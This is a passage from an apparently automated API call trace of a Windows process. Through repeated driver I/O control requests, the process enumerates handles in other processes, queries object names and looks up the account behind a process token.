KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.671] PsReleaseProcessExitSynchronization () returned 0x2 [0226.671] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.671] ObQueryNameString (in: Object=0xfffff8a001b10320, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.671] ObfDereferenceObject (Object=0xfffff8a001b10320) returned 0x2 [0226.671] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.671] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.671] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.671] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0226.672] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.672] PsAcquireProcessExitSynchronization () returned 0x0 [0226.672] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.672] ObReferenceObjectByHandle (in: Handle=0x330, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001bde960, HandleInformation=0x0) returned 0x0 [0226.672] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.672] PsReleaseProcessExitSynchronization () returned 0x2 [0226.672] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.672] ObQueryNameString (in: Object=0xfffff8a001bde960, ObjectNameInfo=0xfffffa800315b7c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800315b7c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.672] ObfDereferenceObject (Object=0xfffff8a001bde960) returned 0x2 [0226.672] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.672] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.672] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.672] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xae, lpOverlapped=0x0) returned 1 [0226.672] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.672] PsAcquireProcessExitSynchronization () returned 0x0 [0226.672] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.672] ObReferenceObjectByHandle (in: Handle=0x334, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80021681e0, HandleInformation=0x0) returned 0x0 [0226.672] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.672] PsReleaseProcessExitSynchronization () returned 0x2 [0226.672] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.672] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.672] ObfDereferenceObject (Object=0xfffffa80021681e0) returned 0x1 [0226.672] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.672] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.672] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.672] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xb4, lpOverlapped=0x0) returned 1 [0226.672] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.672] PsAcquireProcessExitSynchronization () returned 0x0 [0226.672] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.672] ObReferenceObjectByHandle (in: Handle=0x33c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001b66540, HandleInformation=0x0) returned 0x0 [0226.673] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.673] PsReleaseProcessExitSynchronization () returned 0x2 [0226.673] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.673] ObQueryNameString (in: Object=0xfffff8a001b66540, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.673] ObfDereferenceObject (Object=0xfffff8a001b66540) returned 0x2 [0226.673] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.673] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.673] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.673] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0226.673] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.673] PsAcquireProcessExitSynchronization () returned 0x0 [0226.673] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.673] ObReferenceObjectByHandle (in: Handle=0x34c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fb3580, HandleInformation=0x0) returned 0x0 [0226.673] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.673] PsReleaseProcessExitSynchronization () returned 0x2 [0226.673] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.673] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.673] ObfDereferenceObject (Object=0xfffffa8001fb3580) returned 0x5 [0226.673] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.673] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.673] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.673] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x90, lpOverlapped=0x0) returned 1 [0226.673] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.673] PsAcquireProcessExitSynchronization () returned 0x0 [0226.673] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.673] ObReferenceObjectByHandle (in: Handle=0x35c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001c4e8c0, HandleInformation=0x0) returned 0x0 [0226.673] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.673] PsReleaseProcessExitSynchronization () returned 0x2 [0226.673] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.673] ObQueryNameString (in: Object=0xfffff8a001c4e8c0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.673] ObfDereferenceObject (Object=0xfffff8a001c4e8c0) returned 0x2 [0226.674] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.674] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.674] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.674] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0226.674] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.674] PsAcquireProcessExitSynchronization () returned 0x0 [0226.674] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.674] ObReferenceObjectByHandle (in: Handle=0x360, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00176cc30, HandleInformation=0x0) returned 0x0 [0226.674] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.674] PsReleaseProcessExitSynchronization () returned 0x2 [0226.674] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.674] ObQueryNameString (in: Object=0xfffff8a00176cc30, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.674] ObfDereferenceObject (Object=0xfffff8a00176cc30) returned 0x2 [0226.674] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.674] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.674] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.674] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0226.674] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.674] PsAcquireProcessExitSynchronization () returned 0x0 [0226.674] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.674] ObReferenceObjectByHandle (in: Handle=0x368, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001759700, HandleInformation=0x0) returned 0x0 [0226.674] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.674] PsReleaseProcessExitSynchronization () returned 0x2 [0226.674] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.674] ObQueryNameString (in: Object=0xfffff8a001759700, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.674] ObfDereferenceObject (Object=0xfffff8a001759700) returned 0x2 [0226.674] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.674] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.674] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.674] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0226.674] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.675] PsAcquireProcessExitSynchronization () returned 0x0 [0226.675] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.675] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80028573a0, HandleInformation=0x0) returned 0x0 [0226.675] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.675] PsReleaseProcessExitSynchronization () returned 0x2 [0226.675] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.675] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.675] ObfDereferenceObject (Object=0xfffffa80028573a0) returned 0x5 [0226.675] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.675] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.675] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.675] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x90, lpOverlapped=0x0) returned 1 [0226.675] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.675] PsAcquireProcessExitSynchronization () returned 0x0 [0226.675] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.675] ObReferenceObjectByHandle (in: Handle=0x380, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001b855f0, HandleInformation=0x0) returned 0x0 [0226.675] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.675] PsReleaseProcessExitSynchronization () returned 0x2 [0226.675] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.675] ObQueryNameString (in: Object=0xfffff8a001b855f0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.675] ObfDereferenceObject (Object=0xfffff8a001b855f0) returned 0x2 [0226.675] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.675] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.675] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.675] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0226.675] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.675] PsAcquireProcessExitSynchronization () returned 0x0 [0226.675] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.675] ObReferenceObjectByHandle (in: Handle=0x384, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001bdbf30, HandleInformation=0x0) returned 0x0 [0226.675] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.676] PsReleaseProcessExitSynchronization () returned 0x2 [0226.676] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.676] ObQueryNameString (in: Object=0xfffff8a001bdbf30, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.676] ObfDereferenceObject (Object=0xfffff8a001bdbf30) returned 0x2 [0226.676] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.676] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.676] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.676] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0226.676] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.676] PsAcquireProcessExitSynchronization () returned 0x0 [0226.676] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.676] ObReferenceObjectByHandle (in: Handle=0x38c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001bb5080, HandleInformation=0x0) returned 0x0 [0226.676] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.676] PsReleaseProcessExitSynchronization () returned 0x2 [0226.676] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.676] ObQueryNameString (in: Object=0xfffff8a001bb5080, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.676] ObfDereferenceObject (Object=0xfffff8a001bb5080) returned 0x2 [0226.676] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.676] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa7c) returned 0xc8 [0226.676] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.676] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80020f7390, HandleInformation=0x0) returned 0x0 [0226.676] ObOpenObjectByPointer (in: Object=0xfffffa80020f7390, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.676] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3f [0226.676] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.676] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.677] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.677] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.677] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.678] CloseHandle (hObject=0xc4) returned 1 [0226.678] CloseHandle (hObject=0xc8) returned 1 [0226.678] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.678] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.678] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.678] PsAcquireProcessExitSynchronization () returned 0x0 [0226.678] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880052b35d0) [0226.678] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ee3070, HandleInformation=0x0) returned 0x0 [0226.678] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.678] PsReleaseProcessExitSynchronization () returned 0x2 [0226.678] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3d [0226.679] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.679] ObfDereferenceObject (Object=0xfffffa8001ee3070) returned 0x1 [0226.679] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.679] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.679] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.679] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0226.679] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.679] PsAcquireProcessExitSynchronization () returned 0x0 [0226.679] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880052b35d0) [0226.679] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fe7380, HandleInformation=0x0) returned 0x0 [0226.679] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.679] PsReleaseProcessExitSynchronization () returned 0x2 [0226.679] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3d [0226.679] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.679] ObfDereferenceObject (Object=0xfffffa8001fe7380) returned 0x1 [0226.679] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.679] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.679] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.679] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0226.679] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.679] PsAcquireProcessExitSynchronization () returned 0x0 [0226.679] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880052b35d0) [0226.679] ObReferenceObjectByHandle (in: Handle=0xec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0226.679] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.679] PsReleaseProcessExitSynchronization () returned 0x2 [0226.679] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3d [0226.679] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: 